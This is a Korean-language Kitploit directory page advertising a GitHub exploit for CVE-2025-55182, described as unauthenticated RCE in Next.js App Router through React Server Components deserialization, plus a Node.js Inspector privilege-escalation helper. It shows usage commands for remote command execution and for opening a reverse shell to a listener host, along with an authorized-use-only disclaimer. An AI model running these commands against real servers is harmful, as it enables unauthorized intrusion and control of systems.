Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182 — CVE-2025-55182용 독립 실행형 익스플로잇으로, React Server Components Flight 역직렬화를 통해 Next.js App Router에서 인증 없이 RCE를 달성하며, 리버스 셸 및 Node.js V8 Inspector 권한 상승 헬퍼를 포함합니다. | Kitploit
도구/GitHubGitHub/r3vpwnx/cve-2025-55182
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubr3vpwnx/cve-2025-55182

CVE-2025-55182

CVE-2025-55182용 독립 실행형 익스플로잇으로, React Server Components Flight 역직렬화를 통해 Next.js App Router에서 인증 없이 RCE를 달성하며, 리버스 셸 및 Node.js V8 Inspector 권한 상승 헬퍼를 포함합니다.

저장소 보기
20시간 42분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 - React2Shell (CVE-2025-55182) React Server Components Flight 역직렬화를 통한 인증 없는 RCE

Next.js App Router 앱에서 React Server Components를 활성화한 경우의 CVE-2025-55182를 위한 독립 실행형 익스플로잇입니다. 서버 액션 엔드포인트로 제작된 RSC Flight 페이로드를 전송하여 인증 없이 원격 코드 실행을 달성합니다. process.mainModule.require 샌드박스 우회를 통해 권한 있는 프로세스에서 코드를 실행하는 Node.js V8 Inspector(디버그 포트) 로컬 권한 상승 헬퍼가 포함되어 있습니다.

CVE: CVE-2025-55182

요구 사항

root@kitploit:~
python3 -m pip install requests    # Python PoC용

사용법

cdp_privesc.py

root@kitploit:~
python3 cdp_privesc.py <target>

(RSC RCE — 벤더 제공, 크레딧 참조)

react2shell-poc.py
root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"          # 오류 기반 명령 탈취
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444

참고 자료

  • https://github.com/p3ta00/react2shell-poc
  • https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce

크레딧

react2shell-poc.py는 p3ta00의 공개 CVE-2025-55182 PoC로, 자체 포함 체인을 위해 https://github.com/p3ta00/react2shell-poc에서 변경 없이 벤더 제공되었습니다. cdp_privesc.py(Node.js V8 Inspector 로컬 권한 상승)는 원본 코드입니다.

면책 조항

승인된 보안 테스트 및 교육 목적으로만 사용하십시오. 소유한 시스템 또는 테스트에 대한 명시적 서면 허가를 받은 시스템에서만 실행하십시오.


작성자: r3vpwnx

도구 다운로드